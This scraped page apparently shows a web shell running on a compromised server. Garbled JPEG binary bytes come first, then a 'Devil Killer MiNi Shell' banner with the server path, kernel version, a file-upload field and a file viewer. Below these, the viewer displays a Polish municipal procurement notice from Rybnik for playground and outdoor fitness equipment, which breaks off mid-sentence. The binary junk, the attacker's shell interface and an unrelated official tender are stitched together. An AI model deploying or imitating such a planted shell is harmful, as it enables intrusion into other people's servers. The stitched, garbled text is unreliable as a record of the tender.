JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20171031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20171031/609359-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 609359-N-2017 z dnia 2017-10-31 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Miasto Rybnik</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa i montaż urządzeń zabawowych oraz urządzeń do ćwiczeń na wolnym powietrzu w dzielnicach miasta Rybnika z podziałem na zadania: zad. 1: Dostawa i montaż urządzeń zabawowych na istniejącym placu zabaw przy ul. Żurawiej dz. BOGUSZOWICE OSIEDLE. zad. 2:	Dostawa i montaż urządzeń zabawowych na istniejącym placu zabaw przy ul. Partyzantów, dz. LIGOTA-LIGOCKA KUŹNIA. zad. 3: Dostawa i montaż urządzeń zabawowych oraz urządzeń siłowni terenowej w ramach projektu ,,Maroko-Nowiny kulturalnie i sportowo" przy ul. H. M. Góreckiego, dz. MAROKO-NOWINY. zad. 4:	Dostawa i montaż urządzeń zabawowych oraz urządzeń do ćwiczeń w ramach projektu ,,Spotkajmy się w dobrej formie!", dz. RYBNICKA KUŹNIA. zad. 5:	Dostawa i montaż urządzeń zabawowych na istniejącym placu zabaw na terenie ZSP10 w ramach projektu ,,Ćwiczymy i myślimy przy tym zdrowo się bawimy!", dz. SMOLNA. zad. 6:	Dostawa i montaż urządzeń zabawowych oraz urządzeń siłowni terenowej w ramach projektu ,,Uatrakcyjnienie placu przyszkolnego na terenie Szkoły Podstawowej nr 12", dz. ZEBRZYDOWICE.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Miasto Rybnik</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">276255430</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Bolesława Chrobrego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">2</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">44-200</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Rybnik</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">+48324392302</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zam_pub@um.rybnik.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">+48324224124</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.rybnik.eu</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">bip.um.rybnik.eu</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">bip.um.rybnik.eu</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">forma pisemna</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Miasta Rybnika, Wydział Zamówień Publicznych, ul. Bolesława Chrobrego 2 pok. 302</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa i montaż urządzeń zabawowych oraz urządzeń do ćwiczeń na wolnym powietrzu w dzielnicach miasta Rybnika z podziałem na zadania: zad. 1: Dostawa i montaż urządzeń zabawowych na istniejącym placu zabaw przy ul. Żurawiej dz. BOGUSZOWICE OSIEDLE. zad. 2:	Dostawa i montaż urządzeń zabawowych na istniejącym placu zabaw przy ul. Partyzantów, dz. LIGOTA-LIGOCKA KUŹNIA. zad. 3: Dostawa i montaż urządzeń zabawowych oraz urządzeń siłowni terenowej w ramach projektu ,,Maroko-Nowiny kulturalnie i sportowo" przy ul. H. M. Góreckiego, dz. MAROKO-NOWINY. zad. 4:	Dostawa i montaż urządzeń zabawowych oraz urządzeń do ćwiczeń w ramach projektu ,,Spotkajmy się w dobrej formie!", dz. RYBNICKA KUŹNIA. zad. 5:	Dostawa i montaż urządzeń zabawowych na istniejącym placu zabaw na terenie ZSP10 w ramach projektu ,,Ćwiczymy i myślimy przy tym zdrowo się bawimy!", dz. SMOLNA. zad. 6:	Dostawa i montaż urządzeń zabawowych oraz urządzeń siłowni terenowej w ramach projektu ,,Uatrakcyjnienie placu przyszkolnego na terenie Szkoły Podstawowej nr 12", dz. ZEBRZYDOWICE.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.271.162.2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiot zamówienia obejmuje dostawę i montaż urządzeń zabawowych oraz urządzeń do ćwiczeń na wolnym powietrzu wraz z wykonaniem prac towarzyszących tj. wykonaniem nawierzchni bezpiecznej z piasku o powierzchni równej strefie bezpieczeństwa i grubości odpowiedniej dla parametru HIC (krytyczna wysokość upadku) oferowanych urządzeń, oraz okresowe przeglądy i serwisowanie urządzeń w okresie gwarancji. z podziałem na zadania:zad. 1: Dostawa i montaż urządzeń zabawowych na istniejącym placu zabaw przy ul. Żurawiej dz. BOGUSZOWICE OSIEDLE.zad. 2:	Dostawa i montaż urządzeń zabawowych na istniejącym placu zabaw przy ul. Partyzantów, dz. LIGOTA-LIGOCKA KUŹNIA.zad. 3: Dostawa i montaż urządzeń zabawowych oraz urządzeń siłowni terenowej w ramach projektu ,,Maroko-Nowiny kulturalnie i sportowo" przy ul. H. M. Góreckiego, dz. MAROKO-NOWINY.zad. 4:	Dostawa i montaż urządzeń zabawowych oraz urządzeń do ćwiczeń w ramach projektu ,,Spotkajmy się w dobrej formie!", dz. RYBNICKA KUŹNIA.zad. 5:	Dostawa i montaż urządzeń zabawowych na istniejącym placu zabaw na terenie ZSP10 w ramach projektu ,,Ćwiczymy i myślimy przy tym zdrowo się bawimy!", dz. SMOLNA.zad. 6:	Dostawa i montaż urządzeń zabawowych oraz urządzeń siłowni terenowej w ramach projektu ,,Uatrakcyjnienie placu przyszkolnego na terenie Szkoły Podstawowej nr 12", dz. ZEBRZYDOWICE.Wymagania ogólne dla wszystkich montowanych w ramach realizacji przedmiotu zamówienia urządzeń: -	muszą być fabrycznie nowe (wcześniej nie montowane),-	muszą być odporne na niekorzystny wpływ warunków atmosferycznych (deszcz, słońce, śnieg) oraz promieniowanie UV,-	muszą być odporne na obciążenia wynikające z normalnej eksploatacji, w przypadku urządzeń do ćwiczeń, o wadze ćwiczącego do 150 kg, -	muszą posiadać dopuszczenie do zastosowania w przestrzeni publicznej, co będzie podparte odpowiednimi atestami / certyfikatami / deklaracjami zgodności z normami (PN-EN 1176, PN-EN 1177, PN-EN 1510, PN-EN 16630) Wymagania szczegółowe: -	wszystkie elementy stalowe: ocynkowane i zabezpieczone dodatkowo powłoką ochronną (malowanie proszkowe / powłoka poliestrowa / lakier akrylowy) lub ze stali nierdzewnej,-	wszystkie elementy drewniane: impregnowane ciśnieniowo preparatami ogniochronnymi i grzybobójczymi oraz lakierowane,-	wszystkie widoczne elementy betonowe: z betonu wibroprasowanego o równej i jednorodnej powierzchni, w przypadku blatów do gry powierzchnia szlifowana i lakierowana, a krawędzie wykończone wtapianą, profilowaną listwą aluminiową, -	łączniki i zaślepki: z tworzyw sztucznych / aluminium / staliwa,-	śruby i nakrętki: stalowe, ocynkowane,-	liny: propylenowe, z rdzeniem z linek stalowych ocynkowanych lub ze stali nierdzewnej,-	siedziska, wykończenia oparć, ścianki, daszki: z kolorowych płyt HPL / HDPE / aluminium / ze stali nierdzewnej / tworzywa sztucznego (twardego ale elastycznego, odpornego na promieniowanie UV), -	brak ostrych krawędzi i niezabezpieczonych wystających elementów łączących, -	mechanizmy (amortyzatory, łożyska, przeguby, elementy cierne): bezobsługoweWYKAZ URZĄDZEŃ STANOWIĄCYCH PRZEDMIOT ZAMÓWIENIA, w podziale na zadania:Zadanie nr 1	Boguszowice Osiedle	KARUZELA- konstrukcja stalowa umieszczona na platformie z blachy o nawierzchni antypoślizgowej o średnicy 1,3-1,5 m- kierownica do wprawiania karuzeli w ruch z rury stalowej o średnicy 20-30 mm- minimum 5 miejsc- poręcze / oparcie zabezpieczające przed upadkiem wykonane z rur stalowych, osadzonych w platformie - siedziska z kolorowych płyt	- wymagane fundamentowanieHUŚTAWKA PODWÓJNA- jedno siedzisko z oparciem i zamknięciem łańcuszkowym, gumowe (dla dzieci młodszych)- jedno siedzisko bez oparcia (dla dzieci starszych)- siedziska zawieszone na łańcuchach - tulejki teflonowe- szerokość 3,0-3,5 m- wysokość 2,4-2,6 m- wymagane fundamentowanie ZESTAW ZABAWOWY ZE ZJEŻDŻALNIĄ- podest linowy (tzw. ,,bocianie gniazdo") o powierzchni ok. 0,8 m usytuowany na wysokości ok. 1,0 m- zjeżdżalnia ze stali nierdzewnej o długości ok. 2,0 m- drabinki wejściowe linowe, stanowiące dodatkowy element zabawy zręcznościowej- wymagane fundamentowanie BUJAKI SPRĘŻYNOWE- konstrukcja kołysząca ze sprężyny stalowej o średnicy ok. 20 cm i wysokości ok. 40 cm- dwa różne wzory, np.: pojazd i zwierzę- wymagane fundamentowanieŁAWKI- prosta konstrukcja stalowa- siedziska i oparcia ze sztywnych listew z tworzywa sztucznego- długość ok. 1,8 m- 2 ławki z oparciami- 2 ławki bez oparć- wymagane fundamentowanieREGULAMIN- konstrukcja stalowa- tablica o wymiarach ok. 0,5 x 0,7 m- tekst regulaminu wykonany w trwałej technice (odpornej na warunki atmosferyczne i promieniowanie UV)- treść i forma graficzna do zaakceptowania przez Zamawiającego - wymagane fundamentowanieZadanie nr 2	Ligota-Ligocka Kuźnia	LINARIUM- linarium obrotowe (możliwość wspinaczki i zabawy jak na karuzeli) - wysokość 2,0-2,5 m- średnica 1,8-2,2 m - wymagane fundamentowaniePIASKOWNICA- piaskownica o konstrukcji betonowej, okrągła- siedzisko z płyt HPL / HDPE na całym obwodzie- średnica 2,7-3,2 m- wysokość ok. 40 cmZadanie nr 3	Maroko Nowiny	GRY INTERAKTYWNE- plansze do gier podwórkowych wykonane z kolorowej masy termoplastycznej na bazie żywicy syntetycznej, instalowane na nawierzchni asfaltowej - 3 różne wzory: np. gra w chińczyka, gra w klasy (potrójne pola), labirynt 3 różnokolorowych tras, każda o długości ok. 5,0 m (do gry w kapsle, skakania, wyścigów modeli zdalnie sterowanych)- powierzchnia każdej z gier minimum 12,0 m2HUŚTAWKA WAGOWA- huśtawka pojedyncza- długość min. 3,0 m- wysokość ok. 0,5 m- siedziska z płyt HPL / HDPE- uchwyty przy siedziskach- odbojnice gumowe w gruncie pod siedziskami- wymagane fundamentowanieBUJAKI SPRĘŻYNOWE- konstrukcja kołysząca ze sprężyny stalowej o średnicy ok. 20 cm i wysokości ok. 40 cm- dwa różne wzory, np.: pojazd i zwierzę- wymagane fundamentowanieURZĄDZENIA SIŁOWNI TERENOWEJ- 6 urządzeń do ćwiczeń na wolnym powietrzu, w tym: 2 urządzenia montowane na stanowiskach pojedynczych i 4 urządzenia montowane jako podwójne na wspólnym słupie / pylonie - potoczne nazwy urządzeń montowanych jako pojedyncze: narciarz biegowy i wioślarz- potoczne nazwy urządzeń montowanych na stanowiskach podwójnych: wahadło, jeździec, pajacyk / nożyce, poręcze (do wzmacniania mięśni ramion i brzucha) - każde urządzenie musi być wyposażone w tabliczkę (wykonaną w trwałej technice odpornej na warunki atmosferyczne) z nazwą urządzenia i instrukcją wykonywania ćwiczeń - wymagane fundamentowanieKOSZE NA ŚMIECI- konstrukcja stalowa- daszek na pojemnikiem- pojemność 35-40 litrówŁAWKI Z OPARCIEM- konstrukcja stalowa z rur o średnicy min. 75 mm- siedziska i oparcia drewniane- długość ok. 1,8 m- wymagane fundamentowanieNAWIERZCHNIA Z BRUKU BETONOWEGO- nawierzchnia z bruku typu ,,holland" o gr. 6 cm (uzupełnienie przestrzeni pomiędzy już zainstalowanymi nawierzchniami pod urządzeniami)- zakończenie ,,wolnych" boków obrzeżami betonowymi 8x30 cm - bruk kolorowyZadanie nr 4	Rybnicka Kuźnia	ZESTAW WIELOFUNKCYJNY DO ĆWICZEŃ- zestaw składający się z minimum 6 elementów o różnym przeznaczeniu bądź minimum 6 odrębnych urządzeń do ćwiczeń- na całość składa się: ławeczka skośna z uchwytami do nóg i rąk, drabinka pozioma o długości min. 2,0 m, drabinka pionowa o wysokości minimum 2,0 m dwa drążki poziome zamontowane na różnych wysokościach (np. 1,8 i 2,2 m) i poręcze (do wzmacniania mięśni ramion i brzucha) - potoczna nazwa zestawu: ,,ścieżka zdrowia"- rozmieszczenie elementów na powierzchni ok. 20 m2- wymagane fundamentowanieZadanie nr 5	Smolna	STOŁY DO GRY W TENISA STOŁOWEGO- powierzchnia blatów z betonu z kruszywa ozdobnego, szlifowana i lakierowana- podpory betonowe do wkopania- wymiary: 274x152 cm, wysokość 76 cm- imitacja siatki z perforowanej blachy ze stali nierdzewnejSTÓŁ DO GRY W SZACHY- powierzchnia blatu z betonu z kruszywa ozdobnego, szlifowana i lakierowana- blat z dwoma planszami do gry w szachy- zestaw składający się ze stolika i 2 ławek z oparciami- podpory betonowe do wkopania- długość całego zestawu: min. 1,8 m- szerokość całego zestawu: ok. 1,8 m- szerokość stolika: ok. 0,8 m- wysokość blatu stolika: 76 cmZadanie nr 6	Zebrzydowice	URZĄDZENIA SIŁOWNI TERENOWEJ- 3 urządzenia do ćwiczeń na wolnym powietrzu, montowane jako stanowiska pojedyncze - potoczne nazwy urządzeń: wyciskanie siedząc, biegacz, pajacyk / nożyce - każde urządzenie musi być wyposażone w tabliczkę (wykonaną w trwałej technice odpornej na warunki atmosferyczne) z nazwą urządzenia i instrukcją wykonywania ćwiczeń - wymagane fundamentowanieSTOŁY DO GRY W TENISA STOŁOWEGO- powierzchnia blatów z betonu z kruszywa ozdobnego, szlifowana i lakierowana- podpory betonowe do wkopania- wymiary: 274x152 cm, wysokość 76 cm- imitacja siatki z perforowanej blachy ze stali nierdzewnejDla podanych w powyższym zestawieniu orientacyjnych wymiarów Zamawiający dopuszcza tolerancję w granicach +/- 10%. W związku z wymaganiami ustawy Prawo ochrony środowiska oraz zapisami ,,Programu Ochrony 